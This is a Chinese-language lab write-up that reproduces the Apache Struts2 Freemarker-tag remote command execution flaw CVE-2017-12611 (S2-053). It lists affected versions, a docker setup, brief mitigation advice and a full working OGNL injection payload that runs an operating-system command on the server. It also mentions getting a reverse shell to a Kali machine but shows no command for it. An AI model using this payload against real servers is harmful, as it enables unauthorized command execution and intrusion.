Apache struts2 Freemarker标签远程命令执行_CVE-2017-12611(S2-053)漏洞复现

时间  2019-12-13
标签 apache struts2 struts freemarker 标签 远程 命令 执行 cve s2 漏洞 复现 栏目 Apache 繁體版
原文   原文链接

Apache struts2 Freemarker标签远程命令执行_CVE-2017-12611(S2-053)漏洞复现java

1、漏洞描述docker

Struts2在使用Freemarker模块引擎的时候,同时容许解析OGNL表达式。致使用户输入的数据自己不会被OGNL解析,可是因为被Freemarker解析一次后变成离开一个表达式,被OGNL解析第二次,致使任意命令执行漏洞。shell

2、漏洞影响版本apache

Struts 2.0.1-struts 2.3.33浏览器

Struts 2.5-Struts 2.5.10bash

3、漏洞环境搭建ui

1.使用docker搭建环境spa

4、漏洞复现3d

一、启动环境code

  

二、浏览器访问

  

POC以下:

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
注: 执行命令的地方在于(#cmd=’id’)

三、查看用户所属组

  

四、反弹shell,把shell反弹到kali上

  

五、在kali 端开启监听,能够看到成功得到目标反弹过来的shell

  

5、漏洞防护

一、 Apache Struts版本最新版本

二、 Freemarker标签不要经过Request方式获取

相关文章
相关标签/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公众号
   欢迎关注本站公众号,获取更多信息
联系我们 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程